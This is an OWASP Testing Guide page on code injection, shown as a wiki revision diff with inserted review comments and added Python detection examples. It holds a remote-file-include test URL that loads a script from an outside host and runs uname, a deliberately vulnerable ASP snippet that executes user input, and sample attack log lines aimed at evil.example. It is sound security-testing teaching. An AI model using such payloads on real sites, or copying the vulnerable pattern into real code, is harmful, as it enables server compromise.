Difference between revisions of "Testing for Code Injection (OTG-INPVAL-012)"

From OWASP
 
Line 1: Line 1:
{{Template:OWASP Testing Guide v2}}
+
== Brief Summary ==
 +
 +
This section describes how an attacker can enter code as input on a web page and have it executed by the web server.
  
== Short Description of the Issue (Topic and Explanation) ==  
+
== Description of the Issue ==
...<br>
+
 +
Code Injection attacks involve an attacker submitting code as input that is processed by the web server as dynamic code or as in an included file. These attacks can target various server side scripting engines, i.e. ASP, PHP, etc.  Proper validation and secure coding practices need to be employed to protect against these attacks.
  
 
== Black Box testing and example ==
 
== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' <br>
+
...<br>
+
'''Testing for PHP Injection vulnerabilities:'''
'''Result Expected:'''<br>
+
 
...<br><br>
+
Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:
== Gray Box testing and example ==  
+
 
'''Testing for Topic X vulnerabilities:'''<br>
+
http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a
...<br>
+
 
'''Result Expected:'''<br>
+
 
...<br><br>
+
'''Result Expected:'''
 +
 
 +
The malicious url is accepted as a parameter for the PHP page, which will later use the value in an include file.
 +
 
 +
 
 +
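Review bot: the new '''Result Expected''' text for the PHP example does not say which of the two query parameters feeds the include and what the other one is for. The URL carries both pin=http://... and cmd=uname%20-a, but the paragraph only says "the malicious url is accepted as a parameter for the PHP page, which will later use the value in an include file"; name the parameter that ends up in the include (pin) and explain what the tester should expect from cmd, or drop it from the example, otherwise the reader cannot tell which part of the request is the injection.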
== Gray Box testing and example ==
 +
 
 +
'''Testing for ASP Code Injection vulnerabilities
 +
 
 +
Examining ASP code for user input used in execution functions, e.g. Can the user enter commands into the Data input field?  Here, the ASP code will save it to file and then execute it:
 +
 
 +
(((<%
 +
If not isEmpty(Request( "Data" ) ) Then
 +
Dim fso, f
 +
Set fso = CreateObject("Scripting.FileSystemObject")
 +
Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
 +
f.Write Request("Data") & vbCrLf
 +
f.close
 +
Set f = nothing
 +
Set fso = Nothing
 +
 
 +
Server.Execute( "data.txt" )
 +
 
 +
Else
 +
%>
 +
<form>
 +
<input name="Data" /><input type="submit" name="Enter Data" />
 +
</form>
 +
<%
 +
End If
 +
%>)))
 +
 
 +
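Review bot: the ASP sample is wrapped in "(((" and ")))", which are not wiki markup and will render literally; put the sample in a <pre> or <nowiki> block instead so that the <%, <form> and <input> tags survive rendering. The gray box section also lost its '''Result Expected:''' subsection (the placeholder one was removed along with the "..." lines), so add one stating what the reviewer should find in this code: Request("Data") is appended to data.txt and that file is then passed to Server.Execute, i.e. the user's input is executed as server-side code.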
 
 
== References ==
 
== References ==
'''Whitepapers'''<br>
 
...<br>
 
'''Tools'''<br>
 
...<br>
 
{{Category:OWASP Testing Project AoC}}
 
[[OWASP Testing Guide v2 Table of Contents]]
 
  
{{Template:Stub}}
+
Security Focus
 +
 
 +
Insecure.org
 +
 
 +
Wikipedia
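Review bot: the new References section lists only three names (Security Focus, Insecure.org, Wikipedia) with no URLs or article titles, and the previous '''Whitepapers''' / '''Tools''' subdivision was dropped rather than filled in. Give each entry a link and say which page is meant, and keep the whitepapers/tools split used by the other Testing Guide sections.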

Revision as of 21:33, 6 November 2006

Brief Summary

This section describes how an attacker can enter code as input on a web page and have it executed by the web server.

Description of the Issue

Code Injection attacks involve an attacker submitting code as input that the web server then processes as dynamic code or as part of an included file. These attacks can target various server-side scripting engines, e.g. ASP, PHP, etc. Proper input validation and secure coding practices need to be employed to protect against these attacks.

Black Box testing and example

Testing for PHP Injection vulnerabilities:

Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:

http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a


Result Expected:

The malicious url is accepted as a parameter for the PHP page, which will later use the value in an include file.
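The black box check above tests the application from the outside; the defender-side counterpart is to make sure an include selector can never be a URL at all, and to spot attempts in the access log. The following Python is an added example, not code from the OWASP guide or from the site named in the URL above: it maps an include parameter through an allowlist (the ALLOWED_INCLUDES names are assumptions) and scans constructed Apache-style log lines for parameter values that look like remote or stream-wrapper URLs, using the query-string shape of the example request.

```python
"""Added example (not from the OWASP page): allowlisting an include selector
and detecting remote-file-include attempts in web server logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed application setup: the page only ever includes one of these local files.
ALLOWED_INCLUDES = {
    "status": "status.php",
    "history": "history.php",
}


def resolve_include(selector: str) -> str:
    """Return the local file for a user-supplied selector, or raise.

    The selector is used as a dictionary key only, so a URL, a path, or a
    traversal sequence can never reach include(): it is simply not a key.
    """
    try:
        return ALLOWED_INCLUDES[selector]
    except KeyError:
        raise ValueError(f"include selector not permitted: {selector!r}") from None


# Values that would make include()/require() fetch code from elsewhere:
# remote schemes, PHP stream wrappers, and protocol-relative URLs.
REMOTE_VALUE = re.compile(r"^(?:https?|ftp|php|data|file)://", re.IGNORECASE)


def looks_like_remote_include(value: str) -> bool:
    """True if a query parameter value looks like a remote or wrapper URL."""
    v = unquote(value).strip()
    return bool(REMOTE_VALUE.match(v)) or v.startswith("//")


REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_requests(log_lines):
    """Scan access-log lines and return (path, parameter, value) for every
    query parameter whose value looks like a remote include target."""
    findings = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for v in values:
                if looks_like_remote_include(v):
                    findings.append((url.path, name, v))
    return findings


# Constructed sample log (Apache combined format); hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Nov/2006:21:33:00 +0000] "GET /uptime.php?pin=http://evil.example/cs.jpg?&cmd=uname%20-a HTTP/1.1" 200 512',
    '203.0.113.7 - - [06/Nov/2006:21:34:10 +0000] "GET /uptime.php?pin=status HTTP/1.1" 200 220',
    '203.0.113.9 - - [06/Nov/2006:21:35:02 +0000] "GET /uptime.php?pin=//evil.example/x.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [06/Nov/2006:21:35:40 +0000] "GET /uptime.php?pin=php://input HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for path, name, value in flag_requests(SAMPLE_LOG):
        print(f"possible remote include: {path} {name}={value}")
    print(resolve_include("status"))
```

The allowlist is the important half: a denylist of URL schemes is useful for detection in logs but is not a substitute for never passing user input to include() in the first place. Disabling allow_url_include (and allow_url_fopen where the application does not need it) is the server-side setting that backs this up.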


Gray Box testing and example

Testing for ASP Code Injection vulnerabilities

Examine the ASP code for user input that reaches execution functions. For example, can the user enter commands into the Data input field? Here, the ASP code saves the input to a file and then executes that file:

<%
If not isEmpty(Request( "Data" ) ) Then
    ' Unvalidated user input is appended to a file under the web root ...
    Dim fso, f
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
    f.Write Request("Data") & vbCrLf
    f.Close
    Set f = Nothing
    Set fso = Nothing

    ' ... and that file is then executed as an ASP page, so the input runs as server-side code
    Server.Execute( "data.txt" )
Else
%>
<form>
<input name="Data" /><input type="submit" name="Enter Data" />
</form>
<%
End If
%>
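The gray box step above is a manual code review: find where Request data enters and whether it can reach Server.Execute, Execute or Eval. As an added example, not part of the OWASP page, the following Python automates that first pass over classic ASP source with a line-by-line heuristic (tainted variables, file handles, files written from tainted data, then sinks). The three embedded scripts are constructed inputs; the first is the page's sample, the others are assumed variants for comparison.

```python
"""Added example (not from the OWASP page): a small static-review helper for
classic ASP that reports execution sinks fed by user input, including the
write-to-file-then-Server.Execute pattern of the sample above."""
import re

# Sources of user input in classic ASP: Request("x"), Request.Form, Request.QueryString ...
SOURCE_RE = re.compile(r"\bRequest\s*(?:\(|\.)", re.IGNORECASE)
# Plain or Set assignments: name = expression
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?(\w+)\s*=\s*(.+)$", re.IGNORECASE)
# FileSystemObject file opened for writing, optionally through Server.MapPath
OPEN_RE = re.compile(
    r'\.(?:OpenTextFile|CreateTextFile)\s*\(\s*(?:Server\.MapPath\s*\(\s*)?"([^"]+)"',
    re.IGNORECASE,
)
# handle.Write expr / handle.WriteLine expr
WRITE_RE = re.compile(r"^\s*(\w+)\.Write(?:Line)?\s+(.+)$", re.IGNORECASE)
# Sinks: a server-side file executed as ASP, or a string evaluated as code
EXEC_FILE_RE = re.compile(r'\bServer\.(?:Execute|Transfer)\s*\(\s*"([^"]+)"', re.IGNORECASE)
EXEC_EXPR_RE = re.compile(r"(?<!\.)\b(?:Execute|ExecuteGlobal|Eval)\b\s*\(?\s*(.+)$", re.IGNORECASE)


def review_asp(source: str):
    """Return [(line_number, reason)] for each sink reached by user input.

    This is a line-by-line heuristic, not a real data-flow analysis: it
    tracks variables assigned from Request, file handles opened by name,
    and files written from tainted data, then checks each sink against them.
    """
    tainted_vars = set()
    handles = {}           # lowercased handle variable -> file name
    tainted_files = set()  # lowercased file names written from user input
    findings = []

    def is_tainted(expr: str) -> bool:
        if SOURCE_RE.search(expr):
            return True
        return any(re.search(rf"\b{re.escape(v)}\b", expr, re.IGNORECASE) for v in tainted_vars)

    for no, raw in enumerate(source.splitlines(), 1):
        code = raw.strip()
        if not code or code.startswith("'"):
            continue
        assign = ASSIGN_RE.match(code)
        opened = OPEN_RE.search(code)
        if assign and opened:
            handles[assign.group(1).lower()] = opened.group(1)
            continue
        if assign and is_tainted(assign.group(2)):
            tainted_vars.add(assign.group(1))
        write = WRITE_RE.match(code)
        if write and write.group(1).lower() in handles and is_tainted(write.group(2)):
            tainted_files.add(handles[write.group(1).lower()].lower())
        exec_file = EXEC_FILE_RE.search(code)
        if exec_file and exec_file.group(1).lower() in tainted_files:
            findings.append((no, f"Server.Execute of {exec_file.group(1)}, which was written from user input"))
            continue
        exec_expr = EXEC_EXPR_RE.search(code)
        if exec_expr and is_tainted(exec_expr.group(1)):
            findings.append((no, "user-controlled expression passed to Execute/Eval"))
    return findings


# Constructed inputs: the page's sample, a direct Eval, and a script with no code sink.
VULNERABLE_ASP = """<%
If not isEmpty(Request( "Data" ) ) Then
    Dim fso, f
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
    f.Write Request("Data") & vbCrLf
    f.Close
    Set f = Nothing
    Set fso = Nothing
    Server.Execute( "data.txt" )
Else
%>
<form>
<input name="Data" /><input type="submit" name="Enter Data" />
</form>
<%
End If
%>"""

DIRECT_EVAL_ASP = """<%
Dim expr
expr = Request.QueryString("expr")
Response.Write Eval(expr)
%>"""

SAFE_ASP = """<%
Dim name
name = Request.Form("name")
Response.Write Server.HTMLEncode(name)
%>"""

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_ASP), ("eval", DIRECT_EVAL_ASP), ("safe", SAFE_ASP)):
        print(label, review_asp(src))
```

The heuristic deliberately errs toward reporting: a flagged line is a place to read by hand, not a confirmed bug, and anything it misses (input passed through a function, a file written in one script and executed in another) still needs the manual review the section describes.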


References

Security Focus

Insecure.org

Wikipedia